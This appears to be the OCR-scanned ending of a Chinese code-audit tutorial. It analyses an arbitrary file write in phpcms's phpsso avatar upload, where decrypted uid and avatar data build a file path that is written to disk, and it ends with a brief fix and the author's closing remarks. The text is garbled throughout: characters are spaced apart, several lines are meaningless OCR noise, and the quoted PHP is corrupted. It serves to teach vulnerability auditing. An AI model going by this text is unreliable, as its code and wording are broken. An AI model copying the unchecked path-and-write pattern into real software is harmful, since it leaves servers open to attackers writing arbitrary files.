/phpcms/phpsso_serverphpcms/modules/phpsso/index.php 
A: 

public function uploadavatar() 

写 的 

$this->uid = $this->data["uid]; Wuid 来 自 解密 出 来 的 uid 
$this->avatardata = $this->data['avatardata']; /数据 内 容 来 自 解密 出 来 的 数据 内 容 
$dir = $avatarfile.$dir1.'/'.$dir2.'/'.$this->uid.'/'; 

/目录 名 里 引用 了 来 自 解密 内 容 的 uid 

$filename = $dir.'180x180.jpg'; 

I| S4 UR B 5] FIT BB uid A SA $dir ¥ * 

$fp = fopen($filename, 'w); 

fwrite($fp, $this->avatardata); 

fclose($fp); 


文件 写 入 了 ， 反 正 是 想 做 什么 做 什么 。 


漏洞 十 明 
如 上 。 


I ES 


y (RA 
修复 方案 


不 要 过 分 信任 自己 的 加 密 解 密 机 制 ， 要 小 心 处 理 每 个 过 程 。 


家 家 草草 的 把 这 篇 文章 写 完 了 。 
己 预期 想 的 少 写 了 很 多 , 因为 在 一 写 的 时 候 还 是 挺 有 感觉 
因为 读书 一 个 月 也 才 放 一 次 假 , 都 是 抽 时 间 在 慢 慢 写 着 。 
后 面 差不多 写 了 1W 字 的 时 候 , 存 稿 竟然 对 了 , 弄 了 半天 也 没 找 回 
就 感觉 不 想 写 了 , 后 面 又 翻 了 翻 找到 了 一 篇 自己 之 前 保存 的 写 了 差不多 两 三 千 字 的 
然后 就 再 慢 慢 的 开始 写 了 , 也 就 草草 的 结束 了 。 


当然 这 里 只 是 总 结 了 一 些 常见 的 类 型 , 肯定 在 实战 中 会 遇 到 各 种 各 样 的 情况 各 种 过 
滤 哈 的 。 


各 种 逻辑 错误 需要 自己 慢 慢 去 体会 了 。 


